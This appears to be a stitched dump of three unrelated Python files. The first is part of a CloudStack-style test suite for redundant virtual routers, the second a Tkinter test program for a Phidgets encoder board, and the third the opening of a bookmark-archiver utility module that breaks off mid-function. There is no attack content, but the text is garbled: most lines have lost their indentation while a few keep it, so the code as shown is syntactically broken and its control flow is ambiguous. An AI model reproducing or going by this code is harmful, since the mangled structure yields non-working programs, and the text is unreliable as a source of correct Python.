'BACKUP',
"Redundant state of the router should be BACKUP but is %s" %
routers[0].redundantstate)
self.debug(
"Checking state of the backup router in %s" %
self.network.name)
routers = Router.list(
self.apiclient,
id=backup_router.id,
listall=True
)
self.assertEqual(
isinstance(routers, list),
True,
"list router should return Primary and backup routers"
)
self.assertEqual(
routers[0].redundantstate,
'PRIMARY',
"Redundant state of the router should be PRIMARY but is %s" %
routers[0].redundantstate)
self.assertEqual(
primary_router.publicip,
routers[0].publicip,
"Public IP should be same after reboot"
)
return
@attr(tags=["advanced", "advancedns", "ssh"])
def test_04_rebootBackupRvR(self):
"""Test reboot backup RVR
"""
# Steps to validate
# 1. createNetwork using network offering for redundant virtual router
# listNetworks returns the allocated network
# 2. listRouters in above network. Lists no routers in the created
# network
# 3. deployVM in above user account in the created network. VM is
# successfully Running
# 4. listRouters that has redundantstate=PRIMARY. only one router is
# returned with redundantstate = PRIMARY for this network
# 5. reboot router that is BACKUP. Router reboots state
# successfully
# 6. lists old BACKUP router in redundantstate=BACKUP, and the old
# PRIMARY router is still PRIMARY+ public IP of the SourceNAT should
# remain same after the reboot
self.debug("Listing routers for network: %s" % self.network.name)
routers = Router.list(
self.apiclient,
networkid=self.network.id,
listall=True
)
self.assertEqual(
isinstance(routers, list),
True,
"list router should return Primary and backup routers"
)
self.assertEqual(
len(routers),
2,
"Length of the list router should be 2 (Backup & Primary)"
)
if routers[0].redundantstate == 'PRIMARY':
primary_router = routers[0]
backup_router = routers[1]
else:
primary_router = routers[1]
backup_router = routers[0]
self.debug("Rebooting the backup router")
try:
Router.reboot(self.apiclient, id=backup_router.id)
except Exception as e:
self.fail("Failed to reboot BACKUP router: %s" % e)
# wait for VR to update state
time.sleep(self.testdata["sleep"])
self.debug(
"Checking state of the backup router in %s" %
self.network.name)
routers = Router.list(
self.apiclient,
id=backup_router.id,
listall=True
)
self.assertEqual(
isinstance(routers, list),
True,
"list router should return Primary and backup routers"
)
self.assertEqual(
routers[0].redundantstate,
'BACKUP',
"Redundant state of the router should be BACKUP but is %s" %
routers[0].redundantstate)
self.debug(
"Checking state of the Primary router in %s" %
self.network.name)
routers = Router.list(
self.apiclient,
id=primary_router.id,
listall=True
)
self.assertEqual(
isinstance(routers, list),
True,
"list router should return Primary and backup routers"
)
self.assertEqual(
routers[0].redundantstate,
'PRIMARY',
"Redundant state of the router should be PRIMARY but is %s" %
routers[0].redundantstate)
self.assertEqual(
primary_router.publicip,
routers[0].publicip,
"Public IP should be same after reboot"
)
return
@attr(tags=["advanced", "advancedns", "ssh"])
def test_05_stopBackupRvR_startInstance(self):
"""Test stop backup RVR and start instance
"""
# Steps to validate
# 1. createNetwork using network offering for redundant virtual router
# listNetworks returns the allocated network
# 2. listRouters in above network. Lists no routers in the created
# network
# 3. deployVM in above user account in the created network. VM is
# successfully Running
# 4. listRouters that has redundantstate=PRIMARY. only one router is
# returned with redundantstate = PRIMARY for this network
# 5. stop router that is BACKUP.
# 6. listRouters in the account and in the network
# 7. deployVM in the user account in the created network
# 8. listRouters in the account and in the network
# 9. delete the account
self.debug("Listing routers for network: %s" % self.network.name)
routers = Router.list(
self.apiclient,
networkid=self.network.id,
listall=True
)
self.assertEqual(
isinstance(routers, list),
True,
"list router should return Primary and backup routers"
)
self.assertEqual(
len(routers),
2,
"Length of the list router should be 2 (Backup & Primary)"
)
if routers[0].redundantstate == 'PRIMARY':
backup_router = routers[1]
else:
backup_router = routers[0]
self.debug("Stopping the backup router")
try:
Router.stop(self.apiclient, id=backup_router.id)
except Exception as e:
self.fail("Failed to stop BACKUP router: %s" % e)
# wait for VR to update state
time.sleep(self.testdata["sleep"])
self.debug(
"Checking state of the backup router in %s" %
self.network.name)
routers = Router.list(
self.apiclient,
id=backup_router.id,
listall=True
)
self.assertEqual(
isinstance(routers, list),
True,
"list router should return Primary and backup routers"
)
        self.assertIn(
            routers[0].redundantstate, [
                'UNKNOWN', 'FAULT'], "Redundant state of the backup router\
                    should be UNKNOWN/FAULT but is %s" %
            routers[0].redundantstate)
# Spawn an instance in that network
vm_2 = VirtualMachine.create(
self.apiclient,
self.testdata["small"],
accountid=self.account.name,
domainid=self.account.domainid,
serviceofferingid=self.service_offering.id,
networkids=[str(self.network.id)]
)
self.debug("Deployed VM in network: %s" % self.network.id)
vms = VirtualMachine.list(
self.apiclient,
id=vm_2.id,
listall=True
)
self.assertEqual(
isinstance(vms, list),
True,
"List Vms should return a valid list"
)
vm = vms[0]
self.assertEqual(
vm.state,
"Running",
"Vm should be in running state after deployment"
)
# wait for VR to update state
time.sleep(self.testdata["sleep"])
self.debug(
"Checking state of the backup router in %s" %
self.network.name)
routers = Router.list(
self.apiclient,
id=backup_router.id,
listall=True
)
self.assertEqual(
isinstance(routers, list),
True,
"list router should return Primary and backup routers"
)
self.assertEqual(
routers[0].redundantstate,
'BACKUP',
"Redundant state of the router should be BACKUP but is %s" %
routers[0].redundantstate)
return
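    # Note (added for clarity): updateNetwork below is the target of a child
    # multiprocessing.Process in test_06_updateVRs_in_sequence; it reports
    # success or failure back to the parent through the write end of a
    # multiprocessing.Pipe, since an exception raised in the child would not
    # propagate to the test runner.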
def updateNetwork(self, conn):
try:
self.network.update(
self.api_client,
networkofferingid=self.network_offering_for_update.id,
updateinsequence=True,
forced=True,
changecidr=False
)
except Exception as e:
conn.send("Failed to update network: %s due to %s"%(self.network.name, e))
conn.send("update Network Complete")
return
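    # Note (added for clarity): listRouters can briefly report fewer than two
    # routers, or none in the PRIMARY state, while a VRRP re-election is in
    # progress, so the helper below polls with a bounded number of retries.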
def get_primary_and_backupRouter(self):
retry = 4
        primary_router = backup_router = None
while retry > 0:
routers = Router.list(
self.apiclient,
networkid=self.network.id,
listall=True
)
retry = retry-1
if len(routers) < 2:
continue
            if not (routers[0].redundantstate == 'PRIMARY' or routers[1].redundantstate == 'PRIMARY'):
                continue
if routers[0].redundantstate == 'PRIMARY':
primary_router = routers[0]
backup_router = routers[1]
break
else:
primary_router = routers[1]
backup_router = routers[0]
break
self.info("primary_router: %s, backup_router: %s" % (primary_router, backup_router))
return primary_router, backup_router
    def check_for_new_backupRouter(self, old_backup_router):
primary_router, backup_router = self.get_primary_and_backupRouter()
retry = 4
self.info("Checking if new router is getting created.")
self.info("old_backup_router:"+old_backup_router.name+" new_backup_router:"+backup_router.name)
while old_backup_router.name == backup_router.name:
self.debug("waiting for new router old router:"+backup_router.name)
retry = retry-1
if retry == 0:
                break
time.sleep(self.testdata["sleep"])
primary_router, backup_router = self.get_primary_and_backupRouter()
if retry == 0:
self.fail("New router creation taking too long, timed out")
    def wait_until_router_stabilises(self):
        retry = 4
while retry > 0:
routers = Router.list(
self.apiclient,
networkid=self.network.id,
listall=True
)
retry = retry-1
self.info("waiting untill state of the routers is stable")
if routers[0].redundantstate != 'UNKNOWN' and routers[1].redundantstate != 'UNKNOWN':
return
            elif retry == 0:
                self.fail("timed out while waiting for the routers to stabilise")
return
time.sleep(self.testdata["sleep"])
@attr(tags=["bharat"])
def test_06_updateVRs_in_sequence(self):
"""Test update network and check if VRs are updated in sequence
"""
# Steps to validate
# update network to a new offering
# check if the primary router is running while backup is starting.
# check if the backup is running while primary is starting.
# check if both the routers are running after the update is complete.
        # clean up the network to make sure it is in a proper state.
        self.network.restart(self.apiclient, cleanup=True)
time.sleep(self.testdata["sleep"])
        self.wait_until_router_stabilises()
old_primary_router, old_backup_router = self.get_primary_and_backupRouter()
self.info("old_primary_router:"+old_primary_router.name+" old_backup_router"+old_backup_router.name)
#chek if the network is in correct state
self.assertEqual(old_primary_router.state, "Running", "The primary router is not running, network is not in a correct state to start the test")
self.assertEqual(old_backup_router.state, "Running", "The backup router is not running, network is not in a correct state to start the test")
worker, monitor = multiprocessing.Pipe()
worker_process = multiprocessing.Process(target=self.updateNetwork, args=(worker,))
worker_process.start()
if not worker_process.is_alive():
message = monitor.recv()
if "Complete" not in message:
self.fail(message)
self.info("Network update Started, the old backup router will get destroyed and a new router will be created")
        self.check_for_new_backupRouter(old_backup_router)
        primary_router, new_backup_router = self.get_primary_and_backupRouter()
        # the primary router should remain running while the backup is being updated
self.assertEqual(primary_router.state, "Running", "State of the primary router is not running")
self.assertEqual(primary_router.redundantstate, 'PRIMARY', "Redundant state of the primary router should be PRIMARY, but it is %s"%primary_router.redundantstate)
self.info("Old backup router:"+old_backup_router.name+" is destroyed and new router:"+new_backup_router.name+" got created")
#wait for the new backup to become primary.
retry = 4
while new_backup_router.name != primary_router.name:
retry = retry-1
if retry == 0:
break
time.sleep(self.testdata["sleep"])
self.info("wating for backup router to become primary router name:"+new_backup_router.name)
primary_router, backup_router = self.get_primary_and_backupRouter()
if retry == 0:
self.fail("timed out while waiting for new backup router to change state to PRIMARY.")
        # new backup router has become primary.
        self.info("newly created router: " + new_backup_router.name + " has changed state to PRIMARY")
        self.info("old primary router: " + old_primary_router.name + " is destroyed")
#old primary will get destroyed and a new backup will be created.
#wait until new backup changes state from unknown to backup
primary_router, backup_router = self.get_primary_and_backupRouter()
retry = 4
while backup_router.redundantstate != 'BACKUP':
retry = retry-1
self.info("waiting for router:"+backup_router.name+" to change state to Backup")
if retry == 0:
break
time.sleep(self.testdata["sleep"])
primary_router, backup_router = self.get_primary_and_backupRouter()
self.assertEqual(primary_router.state, "Running", "State of the primary router is not running")
self.assertEqual(primary_router.redundantstate, 'PRIMARY', "Redundant state of the primary router should be PRIMARY, but it is %s"%primary_router.redundantstate)
if retry == 0:
self.fail("timed out while waiting for new backup rotuer to change state to PRIMARY.")
        # the network update is complete; finally, both routers should be running.
        new_primary_router, new_backup_router = self.get_primary_and_backupRouter()
self.assertEqual(new_primary_router.state, "Running", "State of the primary router:"+new_primary_router.name+" is not running")
self.assertEqual(new_backup_router.state, "Running", "State of the backup router:"+new_backup_router.name+" is not running")
worker_process.join()
|
test_program_for_Phidgets1xEncoderENC1000_ReubenPython2and3Class.py | # -*- coding: utf-8 -*-
'''
Reuben Brewer, Ph.D.
reuben.brewer@gmail.com
www.reubotics.com
Apache 2 License
Software Revision F, 05/22/2022
Verified working on: Python 2.7, 3.8 for Windows 8.1, 10 64-bit and Raspberry Pi Buster (no Mac testing yet).
'''
__author__ = 'reuben.brewer'
from Phidgets1xEncoderENC1000_ReubenPython2and3Class import *
from MyPrint_ReubenPython2and3Class import *
import os, sys, platform
import time, datetime
import traceback #needed for the exception handlers below
import threading
import collections
###############
if sys.version_info[0] < 3:
from Tkinter import * #Python 2
import tkFont
import ttk
else:
from tkinter import * #Python 3
import tkinter.font as tkFont #Python 3
from tkinter import ttk
###############
###############
if sys.version_info[0] < 3:
from builtins import raw_input as input
else:
from future.builtins import input as input #"sudo pip3 install future" (Python 3) AND "sudo pip install future" (Python 2)
###############
###############
import platform
if platform.system() == "Windows":
import ctypes
winmm = ctypes.WinDLL('winmm')
winmm.timeBeginPeriod(1) #Set minimum timer resolution to 1ms so that time.sleep(0.001) behaves properly.
###############
###########################################################################################################
##########################################################################################################
def getPreciseSecondsTimeStampString():
ts = time.time()
return ts
##########################################################################################################
##########################################################################################################
##########################################################################################################
##########################################################################################################
def TestButtonResponse():
global MyPrint_ReubenPython2and3ClassObject
global USE_MYPRINT_FLAG
if USE_MYPRINT_FLAG == 1:
MyPrint_ReubenPython2and3ClassObject.my_print("Test Button was Pressed!")
else:
print("Test Button was Pressed!")
##########################################################################################################
##########################################################################################################
##########################################################################################################
##########################################################################################################
def GUI_update_clock():
global root
global EXIT_PROGRAM_FLAG
global GUI_RootAfterCallbackInterval_Milliseconds
global USE_GUI_FLAG
global Phidgets1xEncoderENC1000_ReubenPython2and3ClassObject
global ENCODER_OPEN_FLAG
global SHOW_IN_GUI_ENCODER_FLAG
global MyPrint_ReubenPython2and3ClassObject
global MYPRINT_OPEN_FLAG
global SHOW_IN_GUI_MYPRINT_FLAG
if USE_GUI_FLAG == 1:
if EXIT_PROGRAM_FLAG == 0:
#########################################################
#########################################################
#########################################################
if ENCODER_OPEN_FLAG == 1 and SHOW_IN_GUI_ENCODER_FLAG == 1:
Phidgets1xEncoderENC1000_ReubenPython2and3ClassObject.GUI_update_clock()
#########################################################
#########################################################
if MYPRINT_OPEN_FLAG == 1 and SHOW_IN_GUI_MYPRINT_FLAG == 1:
MyPrint_ReubenPython2and3ClassObject.GUI_update_clock()
#########################################################
root.after(GUI_RootAfterCallbackInterval_Milliseconds, GUI_update_clock)
#########################################################
#########################################################
##########################################################################################################
##########################################################################################################
##########################################################################################################
##########################################################################################################
def ExitProgram_Callback():
global EXIT_PROGRAM_FLAG
print("ExitProgram_Callback event fired!")
EXIT_PROGRAM_FLAG = 1
##########################################################################################################
##########################################################################################################
##########################################################################################################
##########################################################################################################
def GUI_Thread():
global root
global root_Xpos
global root_Ypos
global root_width
global root_height
global GUI_RootAfterCallbackInterval_Milliseconds
global USE_TABS_IN_GUI_FLAG
################################################# KEY GUI LINE
#################################################
root = Tk()
#################################################
#################################################
#################################################
#################################################
global TabControlObject
global Tab_MainControls
global Tab_ENCODER
global Tab_MyPrint
if USE_TABS_IN_GUI_FLAG == 1:
#################################################
TabControlObject = ttk.Notebook(root)
Tab_MainControls = ttk.Frame(TabControlObject)
TabControlObject.add(Tab_MainControls, text=' Main Controls ')
Tab_ENCODER = ttk.Frame(TabControlObject)
TabControlObject.add(Tab_ENCODER, text=' ENCODER ')
Tab_MyPrint = ttk.Frame(TabControlObject)
TabControlObject.add(Tab_MyPrint, text=' MyPrint Terminal ')
TabControlObject.pack(expand=1, fill="both") # CANNOT MIX PACK AND GRID IN THE SAME FRAME/TAB, SO ALL .GRID'S MUST BE CONTAINED WITHIN THEIR OWN FRAME/TAB.
############# #Set the tab header font
TabStyle = ttk.Style()
TabStyle.configure('TNotebook.Tab', font=('Helvetica', '12', 'bold'))
#############
#################################################
else:
#################################################
Tab_MainControls = root
Tab_ENCODER = root
Tab_MyPrint = root
#################################################
#################################################
#################################################
#################################################
TestButton = Button(Tab_MainControls, text='Test Button', state="normal", width=20, command=lambda i=1: TestButtonResponse())
TestButton.grid(row=0, column=0, padx=5, pady=1)
#################################################
################################################# THIS BLOCK MUST COME 2ND-TO-LAST IN def GUI_Thread() IF USING TABS.
root.protocol("WM_DELETE_WINDOW", ExitProgram_Callback) # Set the callback function for when the window's closed.
root.title("test_program_for_Phidgets1xEncoderENC1000_ReubenPython2and3Class")
root.geometry('%dx%d+%d+%d' % (root_width, root_height, root_Xpos, root_Ypos)) # set the dimensions of the screen and where it is placed
root.after(GUI_RootAfterCallbackInterval_Milliseconds, GUI_update_clock)
root.mainloop()
#################################################
################################################# THIS BLOCK MUST COME LAST IN def GUI_Thread() REGARDLESS OF CODE.
root.quit() #Stop the GUI thread, MUST BE CALLED FROM GUI_Thread
root.destroy() #Close down the GUI thread, MUST BE CALLED FROM GUI_Thread
#################################################
##########################################################################################################
##########################################################################################################
##########################################################################################################
##########################################################################################################
if __name__ == '__main__':
#################################################
#################################################
global my_platform
if platform.system() == "Linux":
if "raspberrypi" in platform.uname(): # os.uname() doesn't work in windows
my_platform = "pi"
else:
my_platform = "linux"
elif platform.system() == "Windows":
my_platform = "windows"
elif platform.system() == "Darwin":
my_platform = "mac"
else:
my_platform = "other"
print("The OS platform is: " + my_platform)
#################################################
#################################################
#################################################
#################################################
global USE_GUI_FLAG
USE_GUI_FLAG = 1
global USE_TABS_IN_GUI_FLAG
USE_TABS_IN_GUI_FLAG = 0
global USE_ENCODER_FLAG
USE_ENCODER_FLAG = 1
global USE_MYPRINT_FLAG
USE_MYPRINT_FLAG = 1
#################################################
#################################################
#################################################
#################################################
global SHOW_IN_GUI_ENCODER_FLAG
SHOW_IN_GUI_ENCODER_FLAG = 1
global SHOW_IN_GUI_MYPRINT_FLAG
SHOW_IN_GUI_MYPRINT_FLAG = 1
#################################################
#################################################
#################################################
#################################################
global GUI_ROW_ENCODER
global GUI_COLUMN_ENCODER
global GUI_PADX_ENCODER
global GUI_PADY_ENCODER
global GUI_ROWSPAN_ENCODER
global GUI_COLUMNSPAN_ENCODER
GUI_ROW_ENCODER = 1
GUI_COLUMN_ENCODER = 0
GUI_PADX_ENCODER = 1
GUI_PADY_ENCODER = 10
GUI_ROWSPAN_ENCODER = 1
GUI_COLUMNSPAN_ENCODER = 1
global GUI_ROW_MYPRINT
global GUI_COLUMN_MYPRINT
global GUI_PADX_MYPRINT
global GUI_PADY_MYPRINT
global GUI_ROWSPAN_MYPRINT
global GUI_COLUMNSPAN_MYPRINT
GUI_ROW_MYPRINT = 2
GUI_COLUMN_MYPRINT = 0
GUI_PADX_MYPRINT = 1
GUI_PADY_MYPRINT = 10
GUI_ROWSPAN_MYPRINT = 1
GUI_COLUMNSPAN_MYPRINT = 1
#################################################
#################################################
#################################################
#################################################
global EXIT_PROGRAM_FLAG
EXIT_PROGRAM_FLAG = 0
global CurrentTime_MainLoopThread
CurrentTime_MainLoopThread = -11111.0
global StartingTime_MainLoopThread
StartingTime_MainLoopThread = -11111.0
global root
global root_Xpos
root_Xpos = 70
global root_Ypos
root_Ypos = 0
global root_width
root_width = 1920 - root_Xpos
global root_height
root_height = 1020 - root_Ypos
global TabControlObject
global Tab_MainControls
global Tab_ENCODER
global Tab_MyPrint
global GUI_RootAfterCallbackInterval_Milliseconds
GUI_RootAfterCallbackInterval_Milliseconds = 30
#################################################
#################################################
#################################################
#################################################
global Phidgets1xEncoderENC1000_ReubenPython2and3ClassObject
global ENCODER_OPEN_FLAG
ENCODER_OPEN_FLAG = -1
global Encoder_MostRecentDict
global Encoder_MostRecentDict_EncodersList_Position_EncoderTicks
Encoder_MostRecentDict_EncodersList_Position_EncoderTicks = [-11111.0]*1
global Encoder_MostRecentDict_EncodersList_Position_Rev
Encoder_MostRecentDict_EncodersList_Position_Rev = [-11111.0]*1
global Encoder_MostRecentDict_EncodersList_Position_Degrees
Encoder_MostRecentDict_EncodersList_Position_Degrees = [-11111.0]*1
global Encoder_MostRecentDict_EncodersList_IndexPosition_EncoderTicks
Encoder_MostRecentDict_EncodersList_IndexPosition_EncoderTicks = [-11111.0]*1
global Encoder_MostRecentDict_EncodersList_IndexPosition_Rev
Encoder_MostRecentDict_EncodersList_IndexPosition_Rev = [-11111.0]*1
global Encoder_MostRecentDict_EncodersList_IndexPosition_Degrees
Encoder_MostRecentDict_EncodersList_IndexPosition_Degrees = [-11111.0]*1
global Encoder_MostRecentDict_EncodersList_Speed_EncoderTicksPerSecond_Raw
Encoder_MostRecentDict_EncodersList_Speed_EncoderTicksPerSecond_Raw = [-11111.0]*1
global Encoder_MostRecentDict_EncodersList_Speed_RPM_Raw
Encoder_MostRecentDict_EncodersList_Speed_RPM_Raw = [-11111.0]*1
global Encoder_MostRecentDict_EncodersList_Speed_RPS_Raw
Encoder_MostRecentDict_EncodersList_Speed_RPS_Raw = [-11111.0]*1
global Encoder_MostRecentDict_EncodersList_Speed_EncoderTicksPerSecond_Filtered
Encoder_MostRecentDict_EncodersList_Speed_EncoderTicksPerSecond_Filtered = [-11111.0]*1
global Encoder_MostRecentDict_EncodersList_Speed_RPM_Filtered
Encoder_MostRecentDict_EncodersList_Speed_RPM_Filtered = [-11111.0]*1
global Encoder_MostRecentDict_EncodersList_Speed_RPS_Filtered
Encoder_MostRecentDict_EncodersList_Speed_RPS_Filtered = [-11111.0]*1
global Encoder_MostRecentDict_EncodersList_ErrorCallbackFiredFlag
Encoder_MostRecentDict_EncodersList_ErrorCallbackFiredFlag = [-1]*1
global Encoder_MostRecentDict_Time
Encoder_MostRecentDict_Time = -11111.0
#################################################
#################################################
#################################################
#################################################
global MyPrint_ReubenPython2and3ClassObject
global MYPRINT_OPEN_FLAG
MYPRINT_OPEN_FLAG = -1
#################################################
#################################################
################################################# KEY GUI LINE
#################################################
if USE_GUI_FLAG == 1:
print("Starting GUI thread...")
GUI_Thread_ThreadingObject = threading.Thread(target=GUI_Thread)
GUI_Thread_ThreadingObject.setDaemon(True) #Should mean that the GUI thread is destroyed automatically when the main thread is destroyed.
GUI_Thread_ThreadingObject.start()
time.sleep(0.5) #Allow enough time for 'root' to be created that we can then pass it into other classes.
else:
root = None
Tab_MainControls = None
Tab_ENCODER = None
Tab_MyPrint = None
#################################################
#################################################
#################################################
#################################################
global Phidgets1xEncoderENC1000_ReubenPython2and3ClassObject_GUIparametersDict
Phidgets1xEncoderENC1000_ReubenPython2and3ClassObject_GUIparametersDict = dict([("USE_GUI_FLAG", USE_GUI_FLAG and SHOW_IN_GUI_ENCODER_FLAG),
("root", Tab_ENCODER), #root Tab_ENCODER
("EnableInternal_MyPrint_Flag", 1),
("NumberOfPrintLines", 10),
("UseBorderAroundThisGuiObjectFlag", 0),
("GUI_ROW", GUI_ROW_ENCODER),
("GUI_COLUMN", GUI_COLUMN_ENCODER),
("GUI_PADX", GUI_PADX_ENCODER),
("GUI_PADY", GUI_PADY_ENCODER),
("GUI_ROWSPAN", GUI_ROWSPAN_ENCODER),
("GUI_COLUMNSPAN", GUI_COLUMNSPAN_ENCODER)])
global Phidgets1xEncoderENC1000_ReubenPython2and3ClassObject_setup_dict
Phidgets1xEncoderENC1000_ReubenPython2and3ClassObject_setup_dict = dict([("GUIparametersDict", Phidgets1xEncoderENC1000_ReubenPython2and3ClassObject_GUIparametersDict),
("VINT_DesiredSerialNumber", 620554), #CHANGE THIS TO MATCH YOUR UNIQUE VINT
("VINT_DesiredPortNumber", 0), #CHANGE THIS TO MATCH YOUR UNIQUE VINT
("DesiredDeviceID", 60),
("WaitForAttached_TimeoutDuration_Milliseconds", 5000),
("NameToDisplay_UserSet", "Reuben's Test ENC1000 Board"),
("UsePhidgetsLoggingInternalToThisClassObjectFlag", 1),
("EncoderUpdateDeltaT_ms", 20),
("MainThread_TimeToSleepEachLoop", 0.001),
("EncodersList_CPR", [400]),
("EncodersList_SpeedExponentialFilterLambda", [0.1]),
("EncodersList_ElectricalIOmode", ["ENCODER_IO_MODE_PUSH_PULL"])])
#"ENCODER_IO_MODE_PUSH_PULL", "ENCODER_IO_MODE_LINE_DRIVER_2K2", "ENCODER_IO_MODE_LINE_DRIVER_10K", "ENCODER_IO_MODE_OPEN_COLLECTOR_2K2", "ENCODER_IO_MODE_OPEN_COLLECTOR_10K"
if USE_ENCODER_FLAG == 1:
try:
Phidgets1xEncoderENC1000_ReubenPython2and3ClassObject = Phidgets1xEncoderENC1000_ReubenPython2and3Class(Phidgets1xEncoderENC1000_ReubenPython2and3ClassObject_setup_dict)
time.sleep(0.25)
ENCODER_OPEN_FLAG = Phidgets1xEncoderENC1000_ReubenPython2and3ClassObject.OBJECT_CREATED_SUCCESSFULLY_FLAG
except:
exceptions = sys.exc_info()[0]
print("Phidgets1xEncoderENC1000_ReubenPython2and3ClassObject __init__: Exceptions: %s" % exceptions, 0)
traceback.print_exc()
#################################################
#################################################
#################################################
#################################################
if USE_MYPRINT_FLAG == 1:
MyPrint_ReubenPython2and3ClassObject_GUIparametersDict = dict([("USE_GUI_FLAG", USE_GUI_FLAG and SHOW_IN_GUI_MYPRINT_FLAG),
("root", Tab_MyPrint),
("UseBorderAroundThisGuiObjectFlag", 0),
("GUI_ROW", GUI_ROW_MYPRINT),
("GUI_COLUMN", GUI_COLUMN_MYPRINT),
("GUI_PADX", GUI_PADX_MYPRINT),
("GUI_PADY", GUI_PADY_MYPRINT),
("GUI_ROWSPAN", GUI_ROWSPAN_MYPRINT),
("GUI_COLUMNSPAN", GUI_COLUMNSPAN_MYPRINT)])
MyPrint_ReubenPython2and3ClassObject_setup_dict = dict([("NumberOfPrintLines", 10),
("WidthOfPrintingLabel", 200),
("PrintToConsoleFlag", 1),
("LogFileNameFullPath", os.getcwd() + "//TestLog.txt"),
("GUIparametersDict", MyPrint_ReubenPython2and3ClassObject_GUIparametersDict)])
try:
MyPrint_ReubenPython2and3ClassObject = MyPrint_ReubenPython2and3Class(MyPrint_ReubenPython2and3ClassObject_setup_dict)
time.sleep(0.25)
MYPRINT_OPEN_FLAG = MyPrint_ReubenPython2and3ClassObject.OBJECT_CREATED_SUCCESSFULLY_FLAG
except:
exceptions = sys.exc_info()[0]
print("MyPrint_ReubenPython2and3ClassObject __init__: Exceptions: %s" % exceptions)
traceback.print_exc()
#################################################
#################################################
#################################################
#################################################
if USE_ENCODER_FLAG == 1 and ENCODER_OPEN_FLAG != 1:
print("Failed to open Phidgets1xEncoderENC1000_ReubenPython2and3Class.")
input("Press any key (and enter) to exit.")
sys.exit()
#################################################
#################################################
#################################################
#################################################
if USE_MYPRINT_FLAG == 1 and MYPRINT_OPEN_FLAG != 1:
print("Failed to open MyPrint_ReubenPython2and3ClassObject.")
input("Press any key (and enter) to exit.")
sys.exit()
#################################################
#################################################
#################################################
#################################################
print("Starting main loop 'test_program_for_Phidgets1xEncoderENC1000_ReubenPython2and3Class.")
StartingTime_MainLoopThread = getPreciseSecondsTimeStampString()
while(EXIT_PROGRAM_FLAG == 0):
###################################################
CurrentTime_MainLoopThread = getPreciseSecondsTimeStampString() - StartingTime_MainLoopThread
###################################################
###################################################
if ENCODER_OPEN_FLAG == 1:
Encoder_MostRecentDict = Phidgets1xEncoderENC1000_ReubenPython2and3ClassObject.GetMostRecentDataDict()
if "Time" in Encoder_MostRecentDict:
Encoder_MostRecentDict_EncodersList_Position_EncoderTicks = Encoder_MostRecentDict["EncodersList_Position_EncoderTicks"]
Encoder_MostRecentDict_EncodersList_Position_Rev = Encoder_MostRecentDict["EncodersList_Position_Rev"]
Encoder_MostRecentDict_EncodersList_Position_Degrees = Encoder_MostRecentDict["EncodersList_Position_Degrees"]
Encoder_MostRecentDict_EncodersList_IndexPosition_EncoderTicks = Encoder_MostRecentDict["EncodersList_IndexPosition_EncoderTicks"]
Encoder_MostRecentDict_EncodersList_IndexPosition_Rev = Encoder_MostRecentDict["EncodersList_IndexPosition_Rev"]
Encoder_MostRecentDict_EncodersList_IndexPosition_Degrees = Encoder_MostRecentDict["EncodersList_IndexPosition_Degrees"]
Encoder_MostRecentDict_EncodersList_Speed_EncoderTicksPerSecond_Raw = Encoder_MostRecentDict["EncodersList_Speed_EncoderTicksPerSecond_Raw"]
Encoder_MostRecentDict_EncodersList_Speed_RPM_Raw = Encoder_MostRecentDict["EncodersList_Speed_RPM_Raw"]
Encoder_MostRecentDict_EncodersList_Speed_RPS_Raw = Encoder_MostRecentDict["EncodersList_Speed_RPS_Raw"]
Encoder_MostRecentDict_EncodersList_Speed_EncoderTicksPerSecond_Filtered = Encoder_MostRecentDict["EncodersList_Speed_EncoderTicksPerSecond_Filtered"]
Encoder_MostRecentDict_EncodersList_Speed_RPM_Filtered = Encoder_MostRecentDict["EncodersList_Speed_RPM_Filtered"]
Encoder_MostRecentDict_EncodersList_Speed_RPS_Filtered = Encoder_MostRecentDict["EncodersList_Speed_RPS_Filtered"]
Encoder_MostRecentDict_EncodersList_ErrorCallbackFiredFlag = Encoder_MostRecentDict["EncodersList_ErrorCallbackFiredFlag"]
Encoder_MostRecentDict_Time = Encoder_MostRecentDict["Time"]
#print("Encoder_MostRecentDict_EncodersList_Position_EncoderTicks: " + str(Encoder_MostRecentDict_EncodersList_Position_EncoderTicks))
###################################################
time.sleep(0.002)
#################################################
#################################################
################################################# THIS IS THE EXIT ROUTINE!
#################################################
print("Exiting main program 'test_program_for_Phidgets1xEncoderENC1000_ReubenPython2and3Class.")
#################################################
if ENCODER_OPEN_FLAG == 1:
Phidgets1xEncoderENC1000_ReubenPython2and3ClassObject.ExitProgram_Callback()
#################################################
#################################################
if MYPRINT_OPEN_FLAG == 1:
MyPrint_ReubenPython2and3ClassObject.ExitProgram_Callback()
#################################################
#################################################
#################################################
##########################################################################################################
########################################################################################################## |
util.py | import os
import re
import sys
import time
import json
import requests
from datetime import datetime
from subprocess import run, PIPE, DEVNULL
from multiprocessing import Process
from urllib.parse import quote
from config import (
IS_TTY,
ARCHIVE_PERMISSIONS,
HTML_FOLDER,
ARCHIVE_DIR,
TIMEOUT,
TERM_WIDTH,
SHOW_PROGRESS,
ANSI,
CHROME_BINARY,
FETCH_WGET,
FETCH_PDF,
FETCH_SCREENSHOT,
FETCH_FAVICON,
FETCH_AUDIO,
FETCH_VIDEO,
SUBMIT_ARCHIVE_DOT_ORG,
)
# URL helpers
without_scheme = lambda url: url.replace('http://', '').replace('https://', '').replace('ftp://', '')
without_query = lambda url: url.split('?', 1)[0]
without_hash = lambda url: url.split('#', 1)[0]
without_path = lambda url: url.split('/', 1)[0]
domain = lambda url: without_hash(without_query(without_path(without_scheme(url))))
base_url = lambda url: without_scheme(url) # unique base url used to dedupe links
short_ts = lambda ts: ts.split('.')[0]
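# Illustrative example (added for clarity; values are assumptions): the
# helpers compose right-to-left to reduce a full URL to a bare domain, while
# base_url only strips the scheme so near-duplicate links can be deduped:
#   domain('https://example.com/a/b?q=1#frag') -> 'example.com'
#   base_url('https://example.com/a/b?q=1') -> 'example.com/a/b?q=1'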
def check_dependencies():
"""Check that all necessary dependencies are installed, and have valid versions"""
python_vers = float('{}.{}'.format(sys.version_info.major, sys.version_info.minor))
if python_vers < 3.5:
print('{}[X] Python version is not new enough: {} (>3.5 is required){}'.format(ANSI['red'], python_vers, ANSI['reset']))
print(' See https://github.com/pirate/bookmark-archiver#troubleshooting for help upgrading your Python installation.')
raise SystemExit(1)
if FETCH_PDF or FETCH_SCREENSHOT:
if run(['which', CHROME_BINARY], stdout=DEVNULL).returncode:
print('{}[X] Missing dependency: {}{}'.format(ANSI['red'], CHROME_BINARY, ANSI['reset']))
print(' Run ./setup.sh, then confirm it was installed with: {} --version'.format(CHROME_BINARY))
print(' See https://github.com/pirate/bookmark-archiver for help.')
raise SystemExit(1)
